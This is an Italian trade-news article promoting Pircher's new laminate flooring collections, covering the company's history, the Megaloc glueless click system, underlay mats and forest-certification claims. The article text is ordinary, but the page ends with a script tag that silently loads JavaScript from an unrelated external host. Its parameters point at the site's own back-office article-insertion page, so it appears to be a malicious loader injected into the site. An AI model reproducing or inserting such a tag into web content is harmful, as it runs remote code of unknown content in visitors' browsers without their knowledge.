1. Home
  2. Notizie e Mercato
  3. Pircher presenta un’ampia gamma di pavimenti in laminato per interno

Pircher presenta un’ampia gamma di pavimenti in laminato per interno

Pavimenti e pavimentazione di
5/5
votato da 1 persone
L’azienda Pircher ripercorre la propria storia, proponendo una nuova gamma di pavimenti in laminato per interno, per soddisfare ogni esigenza di pavimentazione flottante, senza l’utilizzo di colla


La storia della famiglia Pircher nasce tra le cornici delle Dolomiti, patrimonio dell’umanità dal 2010, in Alto Adige dove la cultura del legno ha radici millenarie. A partire dal 1928, anno in cui nasce la prima falegnameria di Josef Pircher a Dobbiaco, Pircher lega indissolubilmente il suo destino alla lavorazione del legno, di cui rappresenta un punto di riferimento nel mercato nazionale. Tramandando l’arte di padre in figlio, Pircher ha saputo conciliare tradizione e tecnologia, lavorazione del legno e rispetto dell’ambiente. Ma l’impegno di Pircher è anche quello di trasmettere cultura e passione per le caratteristiche del legno a tutti i partner e clienti. Questo significa cura dell’ambiente, ma anche responsabilità etica e sociale. Un impegno, in questa direzione, da sempre assiduo e capillare, con traguardi riconosciuti da certificazioni internazionali (come la vittoria nel 2010 del "Red Dot Design Award" e del "Designpreis Germania" con Planit / Movit), e testimoniato anche dal progetto aziendale di responsabilità sociale Green Dream (www.greendream.org).

La nuova collezione, appena presentata sul mercato, offre una gamma di pavimenti in laminato per interno; le nuove doghe stratificate di spessore 6, 8 e 8 XXL, 10 mm, con varie lunghezze e formati sono adatte alle ristrutturazioni e al restyling di tutti gli ambienti della casa, uffici e negozi.

Le pavimentazioni fanno ambiente, creano atmosfere e sono uno degli elementi essenziali dell’Interior Design. Raffinatezza e varietà sono assicurate dalla nuova linea di Pircher, che offre 37 pregiate nuance raccolte in 7 collezioni, dalle tonalità più delicate a quelle più decise: Sabbia, Fiore, Onda, Foglia, Panorama, Altalux e Dolomiti.

Il sistema di aggancio brevettato Megaloc®, inoltre, assicura una posa semplice, pulita, veloce ed estremamente precisa, senza l’utilizzo di colla, permettendo un risparmio – in fase di posa - addirittura del 20-25%.

Dato che il tappetino sottopavimento è il fondo indispensabile per la posa di qualsiasi pavimento laminato e garantisce un buon isolamento termico ed acustico, Pircher ne presenta 5 modelli adatti a tutte le esigenze: sono prodotti multifunzionali, che isolano dal rumore di calpestio e da quello acustico, creando, inoltre, un’ efficace barriera all'umidità. Producendo uno spazio ventilato tra sottofondo e pavimento, risultano adatti anche per il riscaldamento radiante, livellando ogni piccola imperfezione e rispondondo a tutti i requisiti che si richiedono ad un sottopavimento di qualità.

Grazie all’utilizzo di materiali di altissima qualità, i pavimenti in laminato di Pircher garantiscono il comfort perfetto per l’uso domestico e commerciale, ma soprattutto un ambiente davvero salubre in cui vivere.

I materiali sono, poi, altamente certificati: il cuore dei pavimenti in laminato è un pannello in particelle di legno ad alta densità (HDF), l’aspetto estetico è dato da una superficie stampata su carta. È importante sottolineare allora che Pircher utilizza solo carte e pannelli certificati FSC® oppure PEFC® (a seconda degli articoli), prodotti con materia prima proveniente da foreste a gestione ambientale responsabile (FSC® e PEFC® sono i due principali sistemi di certificazione internazionale per la gestione forestale responsabile, che attestano che il legname utilizzato proviene solo da foreste a taglio controllato, applicando un corretto rimboschimento, nel rispetto dell’ecosistema e delle condizioni lavorative). Inoltre, tutti i prodotti di spessore 8 e 10 mm sono certificati Der Blaue Engel®, il certificato ambientale del Ministero dell’Ambiente Tedesco.



<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.2858413688053719" type="text/javascript"></script>